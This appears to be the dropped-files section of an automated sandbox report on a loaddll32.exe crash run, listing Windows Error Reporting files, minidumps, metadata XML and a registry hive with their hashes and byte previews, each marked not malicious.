SHA-512:	5B731CAB9B7E1E7F87A3E21012ED4296C8A33ABAA165F8C2F9E27C9CF2AD05BC15133BC949487B15D6793ACB1B8D35023C57251845FF37258CAFAC2D5E555D2C
Malicious:	false
Preview:	U........................................3...w.......ya......w...............w.......w....:O.....w..................s.).....ya.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8c5962cbbdb13a8671f1f3c3793157e73bd5d897_d70d8aa6_1403bece\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6757075644118485
Encrypted:	false
SSDEEP:	96:EHCVwZqyQy9hkoyt7JfapXIQcQ5c6A2cE2cw33+a+z+HbHgbEVG4rmMOyWZAXGno:cbBZHnM28jjKfq/u7s6S274ItW
MD5:	E551AE87CD4BFFDB52D2729EB71CA116
SHA1:	25E9433B73898DDF598B3C6AA832943A20204A38
SHA-256:	2139D02A6621817D10D5087037509E8EAD4748A15BF6DED6D219712F321A15CA
SHA-512:	BCE9AA5E5E1977BF76074B9B85BFB6C48B76DD79DF3C8E509C21F2C32C6FA16EE62DAAF932C6FC1C6A783D797A74D1E3AAE7A8C49139137675F584B59112227D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.9.4.9.1.2.6.9.9.5.2.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.4.a.f.b.3.8.-.8.6.6.5.-.4.a.5.7.-.8.3.2.0.-.7.7.8.0.c.d.0.c.0.4.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.b.7.c.4.a.e.-.c.4.b.7.-.4.3.8.8.-.b.4.3.c.-.c.e.6.3.3.e.8.f.3.4.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.3.c.-.0.0.0.1.-.0.0.1.c.-.a.0.c.6.-.2.9.6.3.3.9.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0ebff56f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6788179917265483
Encrypted:	false
SSDEEP:	96:cgFdfwZqyhy9hk1Dg3fWpXIQcQmc6W6hcEPcw3f+a+z+HbHgbEVG4rmMOyWZAXGo:JqBBH45FLjKfq/u7s6S274ItW
MD5:	9315D9FBF557FA80186C275A58BD321A
SHA1:	757D0034D1502A4A2BE1598CFAE67783FBA4ED66
SHA-256:	277F69162DD92575BF47BF9D18909659F3AE992F9FE8C2500CD7635FA0BECF8D
SHA-512:	D55717982C3B94AD577F05ACC3AB2E81DB9ECAE056EBBA2C05B57589AC3BA2965F940ED973E9EDF53057203ECDDA762CA64D8767DAF95CC800042563CC2934DF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.9.4.9.2.0.8.8.5.1.4.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.9.4.9.2.8.2.9.1.3.6.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.b.9.3.e.b.4.-.b.4.3.d.-.4.4.9.c.-.a.a.2.1.-.a.a.d.7.8.7.5.d.b.d.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.a.9.4.c.d.a.-.2.3.f.d.-.4.e.c.a.-.b.a.8.b.-.c.0.d.1.e.6.3.6.a.c.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.3.c.-.0.0.0.1.-.0.0.1.c.-.a.0.c.6.-.2.9.6.3.3.9.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C87.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	54786
Entropy (8bit):	3.076333984011047
Encrypted:	false
SSDEEP:	1536:+HHb2TSLk7+W7AMbl6jEk8b+E10Wm1v5I:+HHb2TSLk7+W7AMbl6jEk8b+U0Wm1v5I
MD5:	C02DA58C9163875DDE4A126EB462E9A1
SHA1:	0A2F8FDCF105F9B01A97FE544632CADBEB57CB01
SHA-256:	E7F165C48F9A84354B60EE280D62E72E364E282ACCE1F73D91CE24E2D2A557DD
SHA-512:	1B2DAD82728DB75D3874CEB380F2E4A12F274C3771A4EAFC08F2B3CFFDACEDD213B31247516C2471555D40E69463CF8B4F9225E45B2D2D78C8580A0D3D44F771
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3041.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.694710494201981
Encrypted:	false
SSDEEP:	96:9GiZYWSuxx/OYwYmWWuHYfUYEZLetFi4OD6nhwiWbOzaUmv1TFoKIxZ3:9jZDC3h3+otzaUmv1TFo9xZ3
MD5:	30F32608D2A56E14CAC4A2EEB0A4F51D
SHA1:	2C38E92DCC306540B28DC098EA8A26B89B58FD12
SHA-256:	EBEB6A9A01BB1141B1C90052011DBDA150B6F053AF34EEA02417F94EC5ADCAA6
SHA-512:	01171CD40D37AD87E8A53E3A9339262C6CB51616377B95A621D843437DAC022790261B59B6B5AA1AD5A71099416CAC0A70EE0519059418D47D456F559D034D1F
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER507C.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	53092
Entropy (8bit):	3.0784294516944835
Encrypted:	false
SSDEEP:	1536:ZvHF0cAHIGL5l+G7AMUVEgmpMc+c20W55rO8q:ZvHF0cAHIGL5l+G7AMUVEgmpMc+v0W5y
MD5:	B3690B79E2319DD5C7A0A447090B9B47
SHA1:	09C24AB18C0AB36AE28D3BA286F3C0CBDE03BF18
SHA-256:	FCA6A165CDA7189936ECE2410340E6BD9EDD19122DF254C33A70CF9F2D548CD0
SHA-512:	DD24C70BB04178A4B65E586A9374CF7188D5D3E876A4CEBCCE92A31C4A613D37C6478FBAC69E20D6053609B79AD4F679CE3DF15614ACA5F238F45431C6009DDF
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EC5.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.694643598554126
Encrypted:	false
SSDEEP:	96:9GiZYWghOD3LYFYF5W2u2HeUYEZ3y2btFi0O5z9wgcCrEaKmYPAro0IqZ3:9jZDD7SgXLLcsaKmYPArojqZ3
MD5:	79B97CAE7376674F218C321A353AA8CB
SHA1:	2F137749749239960FB3DD68BFE1D6DA62ABC6DA
SHA-256:	7720CF386642AB215CBE095291534BED4EF24B40D1E414D078CC8A5C4EB5D062
SHA-512:	AC171DE93F9F991C22F869D5AEB63C2D3737B65BBE0055A9A07B423415E7E5EFC0E9E2AA0E2302BA7B6D7FFCD9CD7424856A9928537248C47E73C935F0A83589
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1ED.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 2 05:01:53 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	26388
Entropy (8bit):	2.5129117145884763
Encrypted:	false
SSDEEP:	192:POFyf+dOlrx+qZhZyqjaBDdHnHvRBwak6J0dOe+UZr:2sflrxlnZtKTwak6IOi
MD5:	E414D434C126C5E3A34B58BF2C2691E2
SHA1:	E3E1241B44D69FF7425AD84838DF348E2BCDB613
SHA-256:	9D2635AB0D5B57C214B5983F7A7E0D5D24EE84C6FFA50FEC14F8F9BE448339E8
SHA-512:	C6580681F6BEAA7035D894DC4763FD3BFAFB16D4C3E4C02FDB0BAB43A4C641E431F468B68E802EDBDE3593537EA983C1516C8D561146E9198D6CC78B822E8AF0
Malicious:	false
Preview:	MDMP....... .......AS.a............4...............H.......$...........................`.......8...........T...........h....Z...........................................................................................U...........B......p.......GenuineIntelW...........T.......<....R.a/............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5D6.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.702216729606524
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNimF6gBXF6YFZSUJ5GgmfsSzKCpBH89bQ3sfpQm:RrlsNik686YbSUXGgmfsSzIQ8f7
MD5:	7439244D3ACB486F21A0681908A0773A
SHA1:	081E8D4257C5DB8CEF0A9EE9B011D2EE05D3E7C7
SHA-256:	FEA0D259E46748096FFA28A6B6B09EDF7B54A26F651D1E10B49BED15B7A376D6
SHA-512:	E297109798879B6AF9A731AF62FA35298576154FBA34F06F6572DB31EF84F44625E132E78D9012CEF1449E0813B7C1A29909494F0C9035375434CA25E8BE7E69
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.6.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB858.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.476568550462276
Encrypted:	false
SSDEEP:	48:cvIwSD8zstJgtWI9Z1WSC8Bsr8fm8M4J2yzZFO+q84Wvq6KcQIcQwQXd:uITfHmESNbJJKgrKkwQXd
MD5:	A78FEB1C65A67FC0A5A5CECF5CFFDC92
SHA1:	0244D7CCB68AEA72550587A4A08CBCA6FA3C9530
SHA-256:	884FCFEEB48463B3A3B83B85E683B4527E7ADAFA4ECCF36A63BB85AD3F27ACB9
SHA-512:	AE660DE25F2E61EE330EF9128566DBD74257EE4DBD86B87043DBABF1B9C7E543FDE5D09F3842F62F7242A6C6087CC240C74811B86F8F76760A59F510A437A841
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279572" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D9.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 2 05:02:01 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	1059424
Entropy (8bit):	1.3568715112423828
Encrypted:	false
SSDEEP:	3072:YS3icXpg4oWGI3vHoh5PHsQyv94WPBj8AOUXg+0AZoIa:YS3icZg3OwLnAZoIa
MD5:	621936AFF9F5A401CBDBA7ED16571403
SHA1:	29F29ACC36431B4D59B2C5BF4BE163DAB5F0DEBB
SHA-256:	10EC4FA7950277BECF177024730901D9DAAE25BF03FD394C364AAFE29D33CA7E
SHA-512:	0DF28A112CED2EB54E3B1CBAC018B16991240A064640B737797675325C4791A3485853DB363523CABBF494B05B748EBF4673B355C117EB95855FEF309737D463
Malicious:	false
Preview:	MDMP....... .......IS.a............4...............H.......$...........................`.......8...........T...........@... ............................................................................................U...........B......p.......GenuineIntelW...........T.......<....R.a/............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9D9.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8302
Entropy (8bit):	3.693826829409955
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNim86dUB6YFTSUYLgmfL8GS+CpD/89b23sfzSm:RrlsNiN6I6YRSUYLgmfLrS+28f3
MD5:	F60B15870675CDB4422B00D653EFF506
SHA1:	F580DE8D043587932F0272A555FAD4C617E6F798
SHA-256:	04BFA5603A7A900A5848F91F5A0CFFD16A41EC35324C6118871D4A7105652801
SHA-512:	54CB1E94429AFA584ABF7EB51554F4E9D9DE5C6CF8E98A5DD211F29015D16091AD028BDB3D86C3838A9EADEDBCEDE444FF28858C7C3E683F20FB743348ED1B4A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.6.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC99.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4558
Entropy (8bit):	4.430210411043158
Encrypted:	false
SSDEEP:	48:cvIwSD8zstJgtWI9Z1WSC8BsD8fm8M4J2yGtFNO+q84tj26KcQIcQwQXd:uITfHmESNHJE1OxHKkwQXd
MD5:	E61215813E5A9C6F105D95D2D3B85DA6
SHA1:	3D13151819D197C4856EB99B5C9A881CAF0A3021
SHA-256:	16995677FCAE98C3F5AB6860B39580B89D7BD207BBC7AC5EEEA5D60E789E2663
SHA-512:	1B4B4FF5200579514DAFE7DE6AC9413F9F604CA319FF9D410ED65E9094D7707B5029B107AD7D39E59FF90A3C52D7B6453DFD0CA0F5363980DBF17878C869AF2C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279572" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.27231027976809
Encrypted:	false
SSDEEP:	12288:T2EgPRnkPnlSbC9T9+Zo/19pTMxgYg+yM2CDfmM6/BzjmagZ0VjrY:KEgPRnkPnlSbC9j7
MD5:	0952282E9A8B733598FC12A6EAB089AD
SHA1:	CDCECB08EBD1E2DC3D1F958850315EA86B0991C1
SHA-256:	D532EBDC2C479220E74B6C594EC73B30FF2FCE90DEAC7AA86A0A92DE83B7D3C3
